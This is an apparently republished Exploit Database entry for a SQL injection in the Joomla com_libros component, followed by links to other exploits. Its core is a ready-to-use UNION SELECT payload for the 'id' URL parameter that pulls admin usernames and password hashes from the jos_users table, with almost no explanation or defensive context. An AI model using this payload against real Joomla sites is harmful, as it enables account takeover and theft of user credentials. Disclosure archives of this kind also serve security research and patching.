Joomla! Component com_libros – SQL Injection

Exploit Database
9 阅读

作者： FL0RiX

日期： 2010-01-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11178/

########################################################################
#Joomla Component com_libros SQL Injection Vulnerability
########################################################################
# Author :FL0RiX
#
# Name : com_libros
#
# Bug Type : SQL Injection
#
# Infection: Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://server/index.php?option=com_libros&task=detail&Itemid=27&id=[EXPLOIT]
#Exploit:null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+jos_users--
########################################################################

last Exploits
Joomla! Component com_libros – SQL Injection的更多信息

Saurus CMS Admin Panel – Multiple Cross-Site Request Forgery Vulnerabilities：
webEdition CMS 6.1.0.2 – Multiple Vulnerabilities：
Joomla! Component JE Property Finder 1.6.3 – SQL Injection：
osCMax 2.5 – ‘/admin/htaccess.php’ Multiple Cross-Site Scripting Vulnerabilities：
SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)：
vAuthenticate 3.0.1 – Authentication Bypass：
LAMS < 3.1 - Cross-Site Scripting：
The Pacer Edition CMS 2.1 – ’email’ Cross-Site Scripting：